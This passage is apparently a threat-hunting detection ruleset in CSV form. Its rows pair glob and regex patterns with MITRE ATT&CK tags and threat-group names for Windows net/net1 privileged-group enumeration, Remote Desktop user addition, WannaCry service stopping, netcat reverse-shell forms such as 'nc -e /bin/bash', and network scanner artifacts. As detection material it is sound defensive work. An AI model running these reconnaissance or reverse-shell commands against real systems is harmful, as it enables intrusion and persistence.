APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net.exe* group *Exchange Trusted Subsystem* 
/domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Exchange\sTrusted\sSubsystem.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net.exe* group *Microsoft Exchange Servers* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Microsoft\sExchange\sServers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net.exe* group *Print Operators* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Print\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net.exe* group *Schema Admins* 
/domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Schema\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net.exe* group *Server Operators* /domain*",".{0,1000}net\.exe.{0,1000}\sgroup\s.{0,1000}Server\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group ""domain admins"" /domain*",".{0,1000}net1\s\sgroup\s\""domain\sadmins\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group ""Domain Computers"" 
/domain*",".{0,1000}net1\s\sgroup\s\""Domain\sComputers\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group ""domain computers"" /domain*",".{0,1000}net1\s\sgroup\s\""domain\scomputers\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group ""enterprise admins"" /domain*",".{0,1000}net1\s\sgroup\s\""enterprise\sadmins\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group ""Domain Admins"" 
/domain*",".{0,1000}net1\sgroup\s\""Domain\sAdmins\""\s\/domain.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group *Account Operators* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Account\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group *Backup Operators* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Backup\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group *Domain Computers* 
/domain*",".{0,1000}net1\sgroup\s.{0,1000}Domain\sComputers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group *Domain Controllers* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Domain\sControllers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group *Enterprise Admins* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Enterprise\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group *Exchange Trusted Subsystem* 
/domain*",".{0,1000}net1\sgroup\s.{0,1000}Exchange\sTrusted\sSubsystem.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group *Microsoft Exchange Servers* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Microsoft\sExchange\sServers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group *Print Operators* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Print\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group *Schema Admins* 
/domain*",".{0,1000}net1\sgroup\s.{0,1000}Schema\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 group *Server Operators* /domain*",".{0,1000}net1\sgroup\s.{0,1000}Server\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1 localgroup ""Remote Desktop Users"" * /add*",".{0,1000}net1\slocalgroup\s\""Remote\sDesktop\sUsers\""\s.{0,1000}\s\/add.{0,1000}","greyware_tool_keyword","net","Adds a user account to the local Remote Desktop Users group","T1035 - T1078 - T1087","TA0003 ","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net1 localgroup *Backup 
Operators*",".{0,1000}net1\slocalgroup\s.{0,1000}Backup\sOperators.{0,1000}","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net1 localgroup admin*",".{0,1000}net1\slocalgroup\sadmin.{0,1000}","greyware_tool_keyword","net","showing users in a privileged group. ","T1069 - T1003","TA0007 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*net1 stop badrv*",".{0,1000}net1\sstop\sbadrv.{0,1000}","greyware_tool_keyword","net","Wannacry Ransomware & NOODLERAT behavior","T1486 - T1490","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Malware","https://www.virustotal.com/gui/file/cde4ca499282045eecd4fc15ac80a232294556a59b3c8c8a7a593e8333cfd3c7/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1.exe* group *Account Operators* 
/domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Account\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1.exe* group *Backup Operators* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Backup\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1.exe* group *Domain Computers* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Domain\sComputers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1.exe* group *Domain Controllers* 
/domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Domain\sControllers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1.exe* group *Enterprise Admins* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Enterprise\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1.exe* group *Exchange Trusted Subsystem* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Exchange\sTrusted\sSubsystem.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1.exe* group *Microsoft 
Exchange Servers* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Microsoft\sExchange\sServers.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1.exe* group *Print Operators* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Print\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1.exe* group *Schema Admins* /domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Schema\sAdmins.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net1.exe* group *Server Operators* 
/domain*",".{0,1000}net1\.exe.{0,1000}\sgroup\s.{0,1000}Server\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/netcat-win32-*.zip*",".{0,1000}\/netcat\-win32\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://nmap.org/ncat/","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*\nc.exe*",".{0,1000}\\nc\.exe.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://nmap.org/ncat/","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*\netcat-win32-*.zip*",".{0,1000}\\netcat\-win32\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://nmap.org/ncat/","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*nc * -e /bin/bash*",".{0,1000}nc\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}","greyware_tool_keyword","netcat","netcat shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z" "*nc -u -lvp 
*",".{0,1000}nc\s\-u\s\-lvp\s.{0,1000}","greyware_tool_keyword","netcat","netcat shell listener","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z" "*ncat * -e /bin/bash*",".{0,1000}ncat\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z" "*ncat --udp * -e /bin/bash*",".{0,1000}ncat\s\-\-udp\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z" "*netcat.exe*",".{0,1000}netcat\.exe.{0,1000}","greyware_tool_keyword","netcat","ncat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z" "*/netscan.exe*",".{0,1000}\/netscan\.exe.{0,1000}","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - 
TA0001","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","network exploitation tool","6","10","N/A","N/A","N/A","N/A" "*\netscan.exe*",".{0,1000}\\netscan\.exe.{0,1000}","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","network exploitation tool","6","10","N/A","N/A","N/A","N/A" "*\netscan.lic*",".{0,1000}\\netscan\.lic.{0,1000}","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","network exploitation tool","6","10","N/A","N/A","N/A","N/A" "*\netscan.xml*",".{0,1000}\\netscan\.xml.{0,1000}","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","network exploitation tool","6","10","N/A","N/A","N/A","N/A" "*\SoftPerfect Network Scanner*",".{0,1000}\\SoftPerfect\sNetwork\sScanner.{0,1000}","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","network exploitation tool","6","10","N/A","N/A","N/A","N/A" 